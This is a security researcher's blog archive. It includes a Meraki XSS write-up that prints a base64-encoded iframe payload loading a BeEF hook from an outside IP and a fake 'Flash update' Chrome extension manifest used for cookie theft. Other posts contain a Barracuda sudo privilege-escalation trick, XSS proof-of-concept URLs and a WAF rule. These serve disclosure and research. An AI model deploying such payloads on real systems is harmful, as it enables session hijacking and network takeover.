Tumblelog by Soup.io
Newer posts are loading.
You are at the newest post.
Click here to check if anything new just came in.

August 22 2013

05:47

Five Golden Rules For A Successful Bug Bounty Program

Bug bounty programs have become a popular complement to already existing security practices, like secure software development and security testing. In this space, there are successful examples with many bugs reported and copious rewards paid out. For vendors, users and researchers, this seems to be a mutually beneficial ecosystem.

True is that not all bug bounty initiatives have been so successful. In some cases, a great idea was poorly executed resulting in frustration and headache for both vendors and researchers.  Ineffective programs are mainly caused by security immaturity, as not all companies are ready and motivated enough to organize and maintain such initiatives.  Bug bounties are a great complement to other practices but cannot completely substitute professional penetration tests and source code analysis. Many organizations fail to understand that and jump on the bounties bandwagon without having mature security practices in place.

Talking with a bunch of friends during BlackHat/Defcon, we came up with a list of five golden rules to set your bug bounty program up for success. Although the list is not exhaustive, it was built by collecting opinions from numerous peers and should be a good representation of what security researchers expect.

If you are a vendor considering to start a similar initiative, please read it carefully.

The Five Golden Rules:

1. Build trust, with facts
Security testing is based on trust, between client and provider. Trust is important during testing, and especially crucial during disclosure time. As a vendor, make sure to provide as much clarity as you can. For duplicate bugs, increase your transparency by providing more details to the reporter (e.g. date/time of the initial disclosure, original bug ID, etc.). Also, fixing bugs and claiming that they are not relevant (thus non-eligible to rewards) is a perfect way to lose trust.

2. Fast turn around
Security researchers are happy to spend extra time on explaining bugs and providing workarounds, however they also expect to get notified (and rewarded) at the same reasonable speed. From reporting the bug to paying out rewards, you should have a fast turn around. Fast means days - not months. Even if you need more time to fix the bug, pay out immediately the reward and explain in detail the complexity of rolling out the patch. Decoupling internal development life cycles and bounties allows you to be flexible with external reporters while maintaining your standard company processes.

3. Get security experts
If you expect web security bugs, make sure to have web security experts around you. For memory corruption vulnerabilities, you need people able to understand root causes and to investigate application crashes. Either internally or through leveraging trusted parties, this aspect is crucial for your reputation. Many of us have experienced situations in which we had to explain basic vulnerabilities and how to replicate those issues. In several cases, the interlocutors were software engineers and not security folks: we simply talk different languages and use different tools.

4. Adequate rewards
Make sure that your monetary rewards are aligned with the market. What's adequate? Check Mozilla, Facebook, Google, Etsy and many others. If you don't have enough budget - just setup a wall of fame, send nice swags and be creative. For instance, you could decide to pay for specific classes of bugs or medium-high impact vulnerabilities only. Always paying at the low end of your rewards range, even for critical security bugs, it is just pathetic. Before starting, crunch some numbers by reviewing past penetration test reports performed by recognized consulting boutiques.

5. Non-eligible bugs
Clarify the scope of the program by providing concrete examples, eligible domains and types of bugs that are commonly rejected. Even so, you will have to reject submissions for a multitude of reasons: be as clear and transparent as possible. Spend a few minutes to explain the reason of rejection, especially when the researcher has over-estimated severity or not properly evaluated the issue.

Happy Bug Hunting, Happy Bug Squashing!

March 11 2013

07:28

Subverting a cloud-based infrastructure with XSS and BeEF

Well, the world is changing. You can probably do a lot more direct damage with a XSS in a high-value site than with a local privilege escalation in sudo [...] - lcamtuf@coredump.cx
If you are intrigued by sophisticated exploits and advanced techniques, Cross-Site Scripting isn't probably the most appealing topic for you. Nevertheless, recent events demonstrated how this class of vulnerabilities has been used to compromise applications and even entire servers.

Today, we are going to present a possible attack scenario based on a real-life vulnerability that has been recently patched by the Meraki team. Although the vulnerability itself isn't particularly interesting, it is revealing how a trivial XSS flaw can be abused to subvert an entire network infrastructure.

Meraki

Meraki is the first cloud-managed network infrastructure company and it's now part of Cisco Systems. The idea is pretty neat: all network devices and security appliances (wired and wireless) can be managed by a cutting-edge web interface hosted in the cloud, allowing Meraki networks to be completely set up and controlled through the Internet. Many enterprises, universities and numerous other businesses are already using this technology.

As usual, new technologies introduce opportunities and risks. In such environments, even a simple Cross-Site Scripting or a Cross-Site Request Forgery vulnerability can affect the overall security of the managed networks.

The vulnerability

During a product evaluation of a cloud managed Wireless Access Point, we noticed the possibility to personalize the portal splash page.  Users accessing your WiFi network can be redirected to a custom webpage (e.g. containing a disclaimer) before accessing Internet.

To further customize our splash page, we started including images and other HTML tags. With big surprise, we quickly discovered that just a basic HTML/JS validation was performed in that context. As a result, we were able to include things like:


What was even more interesting is the fact that the splash page is also hosted in the cloud. Unlike traditional WiFi APs where the page is hosted on the device itself, Meraki appliances use cloud resources.

https://n20.meraki.com/splash/?mac=XXXX&client_ip=XXXX&client_mac=XXXX&vap=0&a=XXXX&b=XXXX&auth_version=5&key=ef1115d... AUTH_KEY...d41c283&node_ip=XXXX&acl_ver=XXXX&continue_url=http%3A%2F%2Fwww.google.com

To protect that page from random visitors, a unique token is used for authentication. Assuming you provide the right token and other required parameters, that page is accessible to Internet users.

Now, let's add to the mix that Meraki uses a limited number of domains for all customers (e.g. n1-29.meraki.com, etc.) and, more importantly, that the dashboard session token is scoped to *.meraki.com. This factor turns the stored XSS affecting our own device's domain to a vulnerability that can be abused to retrieve the dashboard cookie of other users and networks. 

Attack scenario

An attacker with access to a Meraki dashboard can craft a malicious JS payload to steal the dashboard session cookie and obtain access to other users' devices. In practice, this allows to completely take over Meraki's wired and wireless networks.

BeEF, the well-know Browser Exploitation Framework, has been used to simulate a realistic attack:

  1. The attacker customizes the splash page of his/her WiFi AP with an arbitrary JS payload, which includes the BeEF hook 
  2. Connecting a device to the physical wireless network controlled by the attacker (e.g. a testing device), it is possible to retrieve the URL of the splash page including the unique token 
  3. Using social engineering, the attacker tricks the victim(s) into visiting the attacker-controlled splash page
  4. At this point, the victim browser is hooked in BeEF
  5. Using one of the available BeEF modules, the attacker can retrieve the HttpOnly dash_auth cookie and get access to the victim's Meraki dashboard 
  6. In the case of Meraki WiFi Access Point, a convenient map will display the position of the device. In the config tab, it is also possible to disclose the network's password. At this stage, the actual network can be fully controlled by the attacker

  

A demonstration video of the attack is also available:



For the interested readers, a few technical details are also shared:
  • Cookie flags (e.g. HttpOnly) are the ASLR/DEP of browser security. It is possible to bypass those mitigation techniques,  although it's getting more complex. Thanks to the progress of browser security and general awareness, stealing cookies marked as HttpOnly via JS payload isn't trivial anymore. Cross Site Tracing and similar techniques are obsolete. Browser plugins have been also patched. Besides exploiting specific servers or browsers bugs, attackers can only rely on social engineering tricks. During our Proof-of-Concept, a fake Flash update has been used to install a malicious Chrome extension and get access to all cookies
  • Chrome extensions run with different privileges than normal JavaScript code executed by the renderer. A Chrome extension can override default SOP restrictions and issue cross-domain requests reading the HTTP response, accessing other browser tabs, and also reading every cookie including those marked as HttpOnly. The manifest of the deliberately backdoored Chrome Extension is the following. The background.js file loads the BeEF hook.

    {
      "name": "Adobe Flash Player Security Update",
      "manifest_version": 2,
      "version": "11.5.502.149",
      "description": "Updates Adobe Flash Player with latest securty updates",
      "background": {
        "scripts": ["background.js"]
      },
      "content_security_policy": "script-src 'self' 'unsafe-eval' https://174.136.111.122; object-src 'self'",
      "icons": { 
        "16": "icon16.png",
        "48": "icon48.png",
        "128": "icon128.png" 
      },
      "permissions": [
    "tabs", 
    "http://*/*", 
    "https://*/*",
      "cookies"
      ]
    }

    Not to blame Google, but just FYI when the backdoored Chrome Extension was uploaded to Google Chrome Webstore, it was available straight after the upload. No checks were made by the application, for example to prevent the upload of an extension with very relaxed permissions, unsafe-eval CSP directive, and Name/Description fields containing an obviously fake content such as "Adobe Flash Update" 
  • Choosing Google Chrome as target browser required to bypass XSS Auditor, the integrated Anti-XSS filter. As discovered by Mario Heiderich, the data URI schema with base64 content can be leverage to bypass the filter. The following code snippet will trigger the classic alert(1), even on the latest Google Chrome at the time of writing (version 24.0.1312.71)


  • The final attack vector to inject the initial BeEF hook in Meraki's page is:

    <iframe src="data:text/html;base64,PHNjcmlwdD5zPWRvY3VtZW50LmNyZ
    WF0ZUVsZW1lbnQoJ3NjcmlwdCcpO3MudHlwZT0ndGV4dC9qYXZhc2Nya
    XB0JztzLnNyYz0naHR0cHM6Ly8xNzQuMTM2LjExMS4xMjIvaG9vay5qc
    yc7ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2hlYWQnKVswX
    S5hcHBlbmRDaGlsZChzKTs8L3NjcmlwdD4=">


    And what is actually executed is:

    <script> s=document.createElement('script'); s.type='text/javascript'; s.src='https://174.136.111.122/hook.js'; document.getElementsByTagName('head')[0].appendChild(s); </script>

    Having a backdoored Chrome Extension running in your browser opens for many new attack vectors wich we din't covered in the PoC. For example, it is possible to inject the BeEF hook in every open tab (you can get the impact of this :-), or use the victim browser as an open proxy using BeEF's Tunneling Proxy component and many other attacks

This blog post is brought to you by @_ikki (NibbleSec) and @antisnatchor (BeEF core dev team).
Thanks to Meraki for the prompt response and the great service.

February 04 2013

06:56

Effective AMF Remoting Message fuzzing with Blazer v0.3


After several weeks of extensive testing and debugging, Blazer v0.3 is finally out!
It's been a long ride since the first lines of code, back in 2011. In this post, I am going to present all new features and describe Tips&Tricks to make your AMF security testing even more effective.

If you are not familiar with Blazer, have a look at the project page: http://code.google.com/p/blazer/.
New to Burp Suite? Have a look at the video tutorials and consider to buy Instant Burp Suite Starter.

What's new?

Blazer v0.3 includes a few interesting new features presented during my DeepSec talk, but even more important is the result of extensive testing on Windows, Mac OS X and Linux using multiple Java Runtime Environments and recent Burp Suite releases.

  • Java classes and source code import feature
    In addition to JARs, it is now possible to import directories containing .class and .java files. The ability to import source code, in addition to application libraries, allows to partially use Blazer even during black-box security testing.
  • AMF request/response export functionality (AMF2XML)
    Sharing details of security vulnerabilities triggered by AMF messages was annoying, as it was not possible to export AMF requests and responses in an intelligible format. Using the AMF2XML feature, it is now possible to export those messages in a file or console.


  • Sandbox feature using a custom security manager 
    The rationale behind the introduction of this feature is to prevent any malicious action caused by application libraries. Blazer uses Java reflection and fairly complex heuristics to automatically instantiate and populate objects by using the application libraries. Application objects are created on the tester's computer and methods are locally invoked to populate attributes before sending the AMF message to the remote service. As a result, untrusted application libraries may end up writing files, opening network sockets or other involuntary IO operations.


  • Numerous bugs and performance issues fixed
    I've fixed more than 20 bugs and multiple performance issues, including an annoying GUI refresh bug on OS X and Windows. This version has been extensively tested on multiple platforms; I've specifically delayed the release to make sure that all issues I've encountered during my testing have been fixed.


BlackBox vs GrayBox testing with Blazer

Blazer is a security tool for gray-box testing. It has been designed and built with the assumption that the application libraries are available to the tester. All Java classes exchanged between client and server should be imported in the tool. This is a realistic assumption if you are doing vulnerability research, not if you are performing a standard pentest.

However, starting from this release, it is actually possible to partially use Blazer during black-box testing. If your application is using primitive types and libraries which can be downloaded from the Internet, you can benefit from Blazer's automatic objects generation by manually crafting a fake .java file including all method signatures:

1. Decompile the client-side Flex components (e.g. SWF files) or monitor the network traffic in order to enumerate all remote methods. Deblaze tool can be used for it. 

2. Create a .java file containing method signatures as observed in the traffic. Something like the following:
package flex.samples.product;
public class ProductService{
public Product getProduct(int prodId){}
3. In Blazer, import the crafted Java source file and all application libraries referenced in the application. At this stage, Blazer can be used to automatically generate objects and perform fuzzing.

Tips & Tricks 

Fuzzing complex applications containing multiple custom classes isn't trivial. To improve coverage and effectiveness, the following recommendations can save you precious time:

  • Always increment the amount of memory that your computer makes available to Burp Suite. If you are generating a large number of AMF messages, consider to chain two instances of Burp Suite. The first instance can be used to intercept the application requests and launch Blazer. In Blazer, set the proxy within tab 3 to point to the second Burp Suite instance. The latter will collect all requests generated by Blazer. In Burp Suite Pro, you can also set automatic backups to prevent any data loss.

  • As of Burp Suite v1.5.01, Burp Extender has a new API. Blazer has been improved to support both old and new Burp Extender APIs. Standard output and error can be displayed within Burp Extender, to a file or in the console screen. During testing, I suggest to redirect those streams to two separate files in order to record all operations and exceptions.

  • Balancing the number of permutations, attack vectors and probability is the magic sauce of Blazer. Read the original whitepaper/presentation, make sure to understand those settings and tune the tool. Even better, check the implementation of the ObjectGenerator class.

  • Divide et impera by breaking up numerous application method signatures into small groups. Start testing a few methods and make sure that you have imported all required application libraries. Finally, review the server responses and monitor the server's status to detect security vulnerabilities. For example - if you are looking for SQL injections - use Burp's filter by search term to identify AMF messages that triggered visible errors and grep for similar strings in the server logs. Blazer appends a custom HTTP header to all AMF requests that can be used to correlate message and method signature. Also, the newest export functionality can be used to review the AMF payload. 

  • Feel free to email me if you have any question.  Also, let me know if you find bugs using Blazer!

    January 25 2013

    10:13

    How to patch your Barracuda virtual appliance

    It's today's "news" about backdoors found in multiple Barracuda gears. Basically, Barracuda appliances have multiple hardcoded system accounts and firewall rules specifically designed to allow remote assistance. If you want more gossip, you can read about it on KrebsOnSecurity, The Register or The H Online.

    A new old story

    According to the original advisory, the bug was discovered on 2012-11-20 by Stefan Viehböck. Although Stefan did pretty interesting research in the past (e.g. WiFi WPS design bug), the Barracuda backdoor is really not a new story. Not only this issue was known, but it was even disclosed and discussed several times:
    Although it's natural to be surprised that such a critical issue has been underestimated for nine years, we should rather use this opportunity to stop these bad practices. Unfortunately, it's not just Barracuda - many vendors have adopted similar poorly-designed solutions for remote assistance. As customers, we should always evaluate products, pretend more accountability and transparency.

    Digital self-defense

    In 2011, while helping a friend during the setup of his network, I came across the advisory from 2004 and I started investigating.  After having confirmed the issue, I decided to patch the virtual appliance on my own. If you think that the mitigation provided by Barracuda in the security definition 2.0.5  is not adequate for your environment, keep reading. Hopefully, Barracuda will reconsider the situation and you won't need to manually patch your device.

    Disclaimer: Use this information at your own risk! 
    You may end up with a broken appliance and no more vendor warranty. Also, I am not a lawyer and I haven't reviewed the product EULA. Finally, note that this method has been tested against the Barracuda WebApp Firewall 660vxl (v7.5.0.x) virtual appliance only. 

    Patching your virtual appliance

    Removing system accounts and changing iptables configuration require privileged shell access. As the original techniques for rooting the device are now deprecated (at least in the device I had), I started looking for other ways to get a root shell. Soon, I realized that it's possible to abuse the recovery partition in order to include arbitrary resources. This technique requires "physical" access to the appliance and multiple reboots thus I consider it better than disclosing the root password and suggest you to abuse the backdoor in order to patch the device.

    Rooting the Barracuda WebApp Firewall requires a multi steps process:

    1) Boot the Barracuda virtual appliance with a standard Linux distribution (e.g. booting from the virtual CD) and mount the recovery partition (/dev/sda9) in order to copy the patcher script (rootme.sh).

    rootme.sh can be downloaded here
      
      $ mkdir /mnt/temp 
      $ mount /dev/sda9 /mnt/temp
      $ cp rootme.sh /mnt/temp/
      $ chmod 777 /mnt/temp/rootme.sh
      $ /mtn/temp/rootme.sh



      $ umount /mnt/temp
      $ reboot


    2) From the web console, revert the firmware to the factory installed version (Advanced-->Firmware Update-->Firmware Revert) and reboot again the appliance. If the factory Firmware Revert button is not available (it's gray and cannot be selected), you need to update the device to the newest firmware and repeat the entire process.

    3) Visit https://barracuda_ip/cgi-mod/rootme.cgiAfter that, you can connect via SSH to the device using a temporary root password. Removing the hardcoded system accounts and changing iptables is left as exercise.


    A few more technical details:

    • rootme.sh is simply used to copy rootme.cgi to the web console webroot in order to facilitate the rooting process
    • rootme.cgi is used to escalate privileges from the Apache user (nobody) to root, change the root password and the firewall rules in order to allow external access 
    • Privileges escalation is possible due to an insecure sudoers configuration. Again, nothing fancy. Please note that I have reported this misconfiguration to Barracuda on 09/12/2011.
       $ sudo mv /bin/ping /tmp/ping.old
       $ sudo ln -s /bin/bash /bin/ping
       $ sudo ping -c whoami


      January 14 2013

      06:15

      Anti-debugging techniques and Burp Suite

      Incipit

      No matter how good a Java obfuscator is, the bytecode can still be analyzed and partially decompiled. Also, using a debugger, it is possible to dynamically observe the application behavior at runtime making reverse engineering much easier. For this reason, developers often use routines to programmatically detect the execution under a debugger in order to prevent easy access to application's internals. Unfortunately, these techniques can be also extremely annoying for people with good intents.

       

      Burp Suite

      Over the course of the years, starting from the very first release, I have been an enthusiastic supporter of Burp Suite. Not only @PortSwigger was able to create an amazing tool, but he also built a strong community that welcome each release as a big event. He has also been friendly and open to receive feedback from us, ready to implement suggested features. Hopefully, he won't change his attitude now.

      Since a few releases, both Burp Suite Free and Pro cannot be executed under a debugger. Unfortunately, this is a severe limitation - especially considering the latest Extensibility API.  The new extensibility framework is a game-changer: it is now possible to fully integrate custom extensions in our favorite tool. But, how to properly debug extensions in an IDE? Troubleshooting fairly complex extensions (e.g. Blazer) requires lot of debugging. Setting breakpoints, stepping in and out of methods, ... are must-have operations.

      Inspired by necessity, I spent a few hours to review the anti-debugging mechanism used in Burp Suite Free. According to Burp's EULA (Free Edition), reversing does not seem to be illegal as long as it is "essential for the purpose of achieving inter-operability". Not to facilitate any illegal activity, this post will discuss details related to the Free edition only.  
      Disclaimer: Don't be a fool, be cool. If you use Burp Pro, you must have a valid license.

       

      Automatic detection of a debugger

      In Java, it is possible to enable remote debugging with the following options:

      -Xdebug -agentlib:jdwp=transport=dt_socket,server=y,address=8000,suspend=n 

      and attach a debugger with:

       jdb --attach [host]:8000

      A common technique to programmatically understand if a program is running under a debugger involves checking the input arguments passed to the Java Virtual Machine. The following is the pseudo-code of a very common technique:
       for(ManagementFactory.getRuntimeMXBean().getInputArguments() ...){
                      if(Argument.contains("-Xdebug") || Argument.contains("-agentlib") ...){
                         // Do something annoying for the user
                  }
      In practice, ManagementFactory returns the managed bean for the runtime system of the current Java Virtual Machine that can be used to retrieve the execution arguments (see RuntimeMXBean API for further details). In case of Burp Free, the application gets shutdown via a System.exit(0);

       

      Bypass techniques, an incomplete list

      First of all, it is always possible to attach the debugger once the Java process is already up and running. Any check performed during the application startup won't block the execution:   

      jdb -connect sun.jvm.hotspot.jdi.SAPIDAttachingConnector:pid=[Process ID]

      Unfortunately, this is a read-only mechanism and cannot be used within traditional IDEs. A few better solutions require tweaking the application in order to modify the program execution. This can be achieved via static changes in the .class files or using static/dynamic bytecode instrumentation. The code above is pretty simple and can be bypassed in several ways:
      • Using ClassEditor, reJ or any other tool that allow .class manipulation, it is just necessary to identify all strings in the constant pool used during the string comparison within the if-statement. For instance, you could replace all strings with a bunch of "a" so that the program won't even enter in the if-statement body
      Manually changing the Constant Pool of a .class file


      •  An even more portable solution, especially when strings obfuscation is used, consist of editing the bytecode using JavaAssist or similar libraries. This allows to write a piece of code that search a class and patch it:
        • For instance, we could force the getInputArguments() to return an empty List;
        • Or, we could insert an arbitrary unconditional jump jsr to skip the program shutdown;
        • Or again, it is possible to override the System.exit() method with a local method using an empty body. First, we need to create a fake static exit(int) method. Then, we replace System.exit() with the custom method within our class.
      Using JavaAssist to replace an existent method within a Class

      Patching Burp Free for debugging your custom extensions

      With the honest intent to simplify the life of coders writing custom Burp's extensions, I have developed a small utility (BurpPatchMe) to patch your own copy of Burp Free - which will allow you to debug your code in NetBeans, Eclipse, etc.
      BurpPatchMe
        A few important details:
        • BurpPatchMe works for Burp Suite Free only. I have included a specific check for it as well as I have used a technique compatible with that release only. Again, you won't be able to remove debugging in Burp Suite Pro using this tool. Go and buy your own copy of this amazing tool!
        • BurpPatchMe is compiled without debugging info and it has been obfuscated too. A quick skiddie prevention mechanism to avoid abuses
        • BurpPatchMe does not contain any Burp's code, library or resource. It is your own responsability to accept the EULA agreement and its conditions, before downloading Burp Free. Also, this tool is provided as it is - please do not send emails/comments asking for "features"
        • Java JDK is required in order to use this tool. All other dependencies are included within the jar
      You can download BurpPatchMe here and launch it with:
      $ java -jar BurpPatchMe.jar -file burpsuite_free_v1.5.jar   
       Long life Burp Suite and happy extensions!

      October 21 2011

      06:24

      "No More Free Bugs" Initiatives

      Two years after the launch of the "No More Free Bugs" philosophy, several companies and Open Source projects are now offering programs designed to encourage security research in their products. In addition, many private firms are publicly offering vulnerability acquisition programs.


      This post is an attempt to catalog all public and active incentives. This includes traditional "Bug Bounty Programs" as well as "Vulnerability/Exploit Acquisition Programs".

      Bug Bounty Programs


      Sponsor
      Target
      Reward Barracuda Vulnerabilities in Barracuda appliances, including Spam/Virus Firewall, Web Filter, WAF, NG Firewall $500-$3,133.7 CCBill.com CCBill web application vulnerabilities $200-$500 Djbdns Verifiable security holes in the latest version of Djbdns $1000 Facebook Facebook web platform security bugs. No third-party applications Starting from $500 Google Chromium browser project and selected Google web properties bugs $500-$3,133.7 Hex-Rays Security bugs in the latest public release of Hex-Rays IDA Up to $3000 Mozilla Firefox, Thunderbird and selected Mozilla Internet-facing websites bugs $500-$3000, plus Mozilla T-shirt Piwik Flaws in Piwik web analytics software $200-$500 Qmail Verifiable security holes in the latest version of Qmail $5000 Tarsnap Tarsnap bugs, affecting either pre-release or released versions $1-$2000
      Vulnerability/Exploit Acquisition Programs


      Sponsor

      Target

      Reward
      BeyondSecurity SecuriTeam High and medium impact bugs in widely spread software $n/a Coseinc Unpublished security vulnerabilities for Windows, Linux and Solaris $n/a Digital Armaments Vulnerability and/or exploit code for high value software $n/a ExploitHub Legitimate market-place for non-zero-day Metasploit exploits $50~$1000 iSight Partners Bugs in typical corporate environment applications $n/a Netragard 0-day exploits against well-known software $n/a TippingPoint ZDI Undisclosed vulnerability research, affecting widely deployed software $n/a plus awards and benefits, depending on the contributor's status VeriSign iDefence Security vulnerabilities in widely deployed applications $n/a White Fir Design Bugs in WordPress code and plugins (with over 1 million downloads and compatible with the most recent WordPress) $50-$500
      Contributions are welcome! If you are aware of an initiative not listed here, please leave a comment and we will update this page over time.

      Just to clarify, we aim at indexing programs that are:
      • Legal. Although black/gray market places exist, we don't certainly want to list them here
      • Active. We want to keep track of ongoing initiatives. Even time-limited programs are eligible, as long as they are still accepting submissions
      • Public. All entries must have publicly available details. This may range from accurate guidelines and rules to just a simple sentence stating the nature of the incentive
      • Reward-based. In most cases, entries are "cash-for-bugs" programs. However, any kind of tangible reward is eligible. "No More Free Bugs" versus "No More Cheap Bugs" disputes are not considered here

      June 21 2011

      22:04

      MS Access SQL Injection Cheat Sheet Reloaded

      SQL Injections are still very popular, for both ethical and unethical attackers.
      Although numerous research covering this topic have been published, SQL Injection vulnerabilities in Microsoft Access powered websites didn't receive much attention.

      Back in 2007, @_daath published the first MS Access SQL Injection Cheat Sheet. A few years later, NibbleSec decided to update the document in a brand new format. New stuff has been added as well as external resources have been merged.

      Enjoy the reloaded MS Access SQL Injection Cheat Sheet

      December 30 2010

      18:19

      TYPO3-SA-2010-020, TYPO3-SA-2010-022 explained

      On 16th December, TYP03 released a new security update (TYPO3-SA-2010-022) for their content management system. Apparently, this web-based framework is widely used in many important websites.
      Within this update, TYPO3 team fixed a vulnerability that I've discovered a few weeks ago. In detail, this discovery pertains to a previous vulnerability fixed in TYPO3-SA-2010-020 and discovered by Gregor Kopf.

      TYP03 decided to follow a policy of least disclosure. Although it's an Open Source project, no technical details are available in the wild besides these (1,2). As I strongly believe that this practice does not improve the overall security (as mentioned in a previous post), I've decided to briefly explain this interesting flaw.

      From the advisory, we can actually deduce two important concepts:
      A Remote File Disclosure vulnerability in the jumpUrl mechanism [..] Because of a non-typesafe comparison between the submitted and the calculated hash, it is possible [..]
      In a nutshell, the JumpUrl mechanism allows to track access on web pages and provided files (e.g. /index.php?id=2&type=0&jumpurl=/etc/passwd&juSecure=1&locationData=2%3a&juHash=2b1928bfab)

      The patch (see this shell script) simply replaces the two equal signs with three (loose vs strict comparisons).

      That's the affected code:


      Having this knowledge, it is probably clear to the reader that the overall goal is to bypass the comparison between $juHash and $calcJuHash. While the former is user supplied (string or array), the latter is derived from a substr(md5_value,10) (string).

      In PHP, comparisons involving numerical strings result in unexpected behaviors (at least for me before studying this chapter).
      If you compare a number with a string or the comparison involves numerical strings, then each string is converted to a number and the comparison performed numerically
      If the string does not contain any of the characters '.', 'e', or 'E' and the numeric value fits into integer type limits (as defined by PHP_INT_MAX), the string will be evaluated as an integer. In all other cases it will be evaluated as a float.
      For instance, the following comparisons are always TRUE:
      if(0=="php")-> TRUE
      if(12=="12php")-> TRUE
      if(110=="110")-> TRUE
      if(100=="10E1")-> TRUE
      if(array()==NULL) -> TRUE
      [..]
      And again, also the following comparisons are TRUE:
      If("0"=="0E19280311"){}
      If("0"=="0E00106552"){}
      If("0"=="0E81046233"){}
      Consequently, we can pad and wait till the substring of an md5 hash resembles this form. If you do the math, you will discover that the combined probability of having such calculated hash is considerably less than pure bruteforcing.
      ~37037037 max trials (worth case) VS 3656158440062976 all possibilities
      In practice, the number of iterations is even less as "0000E13131" and similar strings are also accepted.

      To further improve this attack, I've discovered another bypass (TYPO3-SA-2010-022) which allows the disclosure of TYPO3_CONF_VARS['SYS']['encryptionKey']. In this way, it is possible to retrieve the key once and download multiple files without repeating the entire process. Using multiple requests, this attack takes a few minutes (8-20 minutes in a local network). A real coder can surely enhance it.

      As you can see from the exploit (posted on The Exploit Database), the fileDenyPattern mechanism bypass is pretty trivial. A demonstration video is also available here (slow connection, sorry).

      Keep your TYPO3 installation updated! A patch is already available from the vendor's site.

      @_ikki

      December 29 2010

      12:46

      Unspecified vulnerabilities

      If you're a pentester, it's probably not news to you that "least disclosure" policies for disclosing vulnerabilities are fruitless. Unfortunately, they are even counterproductive for the entire security ecosystem and I will try to convince you within this post.

      Before going any further, let's explain what "least disclosure" actually means.
      In a nutshell, least disclosure is about providing the least necessary facts of vulnerabilities that are needed to know if a user might be affected and what the possible impact would be. No technical details, no exploits, no proof-of-concept code.

      As mentioned here, you may argue that it increases the overall security as a random "black hat needs to put some efforts in thinking and coding before he's able to exploit a vulnerability".

      However, we all claim that "security through obscurity" is bad:
      • Aggressors don't have time constraints. They can analyze patches, read all documentation and spend nights on a single flaw

      • No technical details in the wild generally means no signatures and detectors in security tools

      • "Least Disclosure" tends to degenerate in "Unspecified Vulnerability in Unspecified Components". Please fix your computer and don't ask why
      Although we cannot certainly force vendors' disclosure policies, sharing the outcome of any security research may be beneficial at the end of the day.

      Thoughtful reader, please note that getting profit from vulnerabilities does not necessary implicate concealing details. For instance, see the Mozilla Security Bounty Program FAQ.
      We're rewarding you for finding a bug, not trying to buy your silence
      If you enjoy the spirit, you may appreciate the following posts. Welcome back NibbleSec readers!

      @_ikki

      January 29 2010

      10:11

      Modern magicians

      Recently, I have been asked to write a non-tech article about pentesting and vulnerability research. As it might be interesting to some readers, I decided to share a few fragments here.

      "Any sufficiently advanced technology is indistinguishable from magic"
      Arthur C. Clarke

      Since my early days with computers, I have always cited this Clarke's Law to people astonished by technology artifacts. These days, I am still using the same quote while explaining my job as a pentester to non-technical persons. Beyond the shadow of doubt, security testing is far away from magic being a complex technology-based process. It requires a proper mix of scientific know-how, creativity and expertise on cutting-edge technologies. Staying on top of the latest in vulnerabilities and computer attacks requires continual study, in-depth research, as well as continual discussions and feedback with fellow security professionals.

      "0days are a device to prove that a client is unready to handle the unknown"
      Pete Herzog

      Understanding incoming threats or even discovering new vulnerabilities gives a crucial advantage over potential aggressors. It allows system owners to protect their installations in spite of the public spread of critical flaws. In the long term, it also provides important insights which are useful to design more secure technologies for the future. As 0days are a product of an intensive research work, vulnerability research activities are essential for pentesting.

      "I’ve always said that hacking is not about skill set. It is mostly about dedication, patience and a lot of motivation"
      Pdp, GNUCITIZEN

      Hacking is about skills, dedication, patience, passion and creativity. Properly mixing these elements makes possible to experiment with computers (and not only!). During a pentest, trying to understand how systems work and using them in an unconventional way is the key to circumvent protections and exploit vulnerabilities. After all, security testing is just about mastering technology and doing magic tricks.
      Tags: ikki hacking

      July 22 2009

      12:26

      XSS flaws are boring!

      Cross-Site Scripting flaws are quite unexciting from the technical point of view. Don't you think?

      Most of the time, it is not challenging to look for XSS vulnerabilities since lot of applications do not provide input validation at all against this specific attack. In addition, the application entry points are so copious that it is like to shoot in a crowded square (well, never tried).

      However, they still exist and we still have to report them.
      We will probably all agree about the dangerous effects of such client side attack. We have seen several real life threats (e.g. CriticalPath Vulnerability, Twitter Worm Attack, StrongWebmail) as well as we know efficient (sufficient?) protection mechanisms (e.g. NoScript, OWASP ESAPI, Secure Coding).

      Having said that, I would like to point out a couple of trivial security flaws I have discovered in the last months: (A) Sun Java Web Console Multiple Cross Site Scripting and yet another (B) Oracle Application Server 10g (v9.x) Cross Site Scripting.

      (A) Just because I believe in full disclosure, let's specify the unspecified input (as reported by the vendor). Due to the lack of input filtering within the "HELP" resources, it is possible to inject JS code and trigger XSS attacks. During my audit, several attack vectors were found:

      /console/faces/com_sun_web_ui/help/helpwindow.jsp
      Parameters: windowTitle, helpFile, pageTitle, mastheadUrl, mastheadDescription, jspPath

      /console/faces/com_sun_web_ui/help/masthead.jsp
      Parameters: mastheadUrl, pageTitle

      PoC example: https://IP:PORT/console/faces/com_sun_web_ui/help/helpwindow.jsp?&windowTitle=&helpFile=%22%3E%3C/FRAMESET%3E%3CFRAME%20SRC=%22javascript:alert(%27XSS%27);%22%3E%3C!--


      (B) In case of OC4J, the problem is triggered with malformed requests containing invalid HTTP methods.
      G<script>alert(123);</script>ET /servlet/ HTTP/1.1
      Host: 127.0.0.1:5500


      501 Not Implemented
      Method G<script>alert(123);</script>ET is not defined in RFC 2068 and is not supported by the Servlet API
      Versions 10.1.3.4.0 and likely all the 10.x releases are not vulnerable.
      Oracle support for the J2EE application container 9.x ended in December 2008, according to the Oracle's Lifetime Support Policy. However, they still provide this insecure software here. From my experience, I've seen several installations of such outdated and unsupported software within corporations. As you can easily imagine, it means no patch...sad indeed.
      Tags: ikki xss owasp

      June 17 2009

      14:05

      HPP and WAF

      HTTP Parameter Pollution used as a WAFs bypass technique seems to be a very favored topic. Just a few updates regarding this matter...

      Lavakumar Kuppan has released his paper as well as the security advisory on how to bypass mod_sec core rules in order to exploit SQL injections in ASP/ASP.NET environment. It is worth to mention that installations using ModSecurity <= 2.5.9 with ModSecurity Core Rules <= 2.5-1.6.1 are vulnerable thus you may consider to check your systems.

      A new whitepaper titled "Detecting remote file inclusion attacks" was released by Breach Security. It discusses a generic rules set that will enable protecting applications from RFI attacks. Once again, the suggested RFI rules set is vulnerable to HPP bypass.

      Most of the suggested rules may be very useful in order to detect generic RFI attacks but they are just not working against HPP attacks, in specific web frameworks.

      IP Address
      SecRule “ARGS” “@rx (ht|f)tps?://([\d\.]+)”
      “t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,deny,phase:2,msg:'RFI’ “
      Function INCLUDE
